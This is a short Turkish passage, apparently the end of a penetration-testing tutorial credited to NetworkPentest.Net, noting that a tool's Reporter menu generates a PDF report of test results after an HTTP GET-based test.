    Reporter menüsünden Generate Report menüsünde otomatik olarak test sonuçları ile ilgili pdf formatında bir rapor hazırlanacaktır.

    Yukarıda http get isteğiyle tamamlanmış bir test bulunmaktadır.
  • Kaynak: NetworkPentest.Net

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites